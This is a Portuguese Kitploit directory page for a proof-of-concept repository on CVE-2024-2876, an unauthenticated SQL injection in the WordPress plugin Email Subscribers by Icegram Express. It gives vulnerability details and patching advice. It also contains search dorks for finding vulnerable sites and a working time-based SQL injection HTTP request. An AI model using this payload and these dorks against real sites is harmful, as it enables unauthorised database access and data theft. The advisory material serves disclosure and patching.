Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2876 — Exploit de prova de conceito para uma vulnerabilidade crítica de injeção SQL no plugin WordPress Email Subscribers. Inclui detalhes de exploração, requisição HTTP e dorks de busca. | Kitploit
Ferramentas/GitHubGitHub/kernel364/cve-2024-2876
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Exploit de prova de conceito para uma vulnerabilidade crítica de injeção SQL no plugin WordPress Email Subscribers. Inclui detalhes de exploração, requisição HTTP e dorks de busca.

Ver Repositório
22há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2876 - Vulnerabilidade de Injeção de SQL no Email Subscribers by Icegram Express

Visão Geral

O CVE-2024-2876 é uma vulnerabilidade crítica de segurança encontrada no plugin "Email Subscribers by Icegram Express" para WordPress. Essa vulnerabilidade afeta versões até 5.7.14 inclusive e representa riscos significativos para mais de 90.000 sites.

Detalhes da Vulnerabilidade

  • CVE-ID: CVE-2024-2876
  • Pontuação CVSS: 9.8 (Crítica)
  • Versões Afetadas: Até 5.7.14
  • Versão Corrigida: 5.7.15 e acima

Descrição

A vulnerabilidade é uma falha de injeção de SQL que permite que atacantes não autenticados executem consultas SQL maliciosas nos bancos de dados WordPress afetados. Ao manipular entradas de usuário que não são devidamente sanitizadas, os atacantes podem extrair informações sensíveis, como nomes de usuário, endereços de e-mail, hashes de senhas e listas de assinantes.

Mecanismo de Exploração

A injeção de SQL ocorre dentro da função run da classe IG_ES_Subscribers_Query do plugin, onde a validação inadequada de entradas leva à execução não autorizada de código SQL. Isso compromete a integridade e a confidencialidade dos dados armazenados no banco de dados WordPress.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Recomendações

  1. Atualização Imediata: Se você estiver usando o plugin "Email Subscribers by Icegram Express", atualize para a versão 5.7.15 ou posterior imediatamente para aplicar a correção de segurança.

  2. Auditorias Regulares: Revise e atualize regularmente todos os plugins e temas do WordPress para suas versões mais recentes, garantindo a segurança.

  3. Plugins de Segurança: Use plugins de segurança do WordPress respeitados para reforçar as defesas contra injeção de SQL e outras ameaças cibernéticas.

  4. Políticas de Senhas Fortes: Implemente senhas fortes e únicas para todas as contas relacionadas ao seu site WordPress para reduzir os riscos de acesso não autorizado.

Impacto da Não Conformidade

Não atualizar o plugin afetado pode deixar os sites vulneráveis a violações de dados e acesso não autorizado. Dado o uso generalizado desse plugin, a ação imediata é crucial para proteger as instalações.

Baixar ferramenta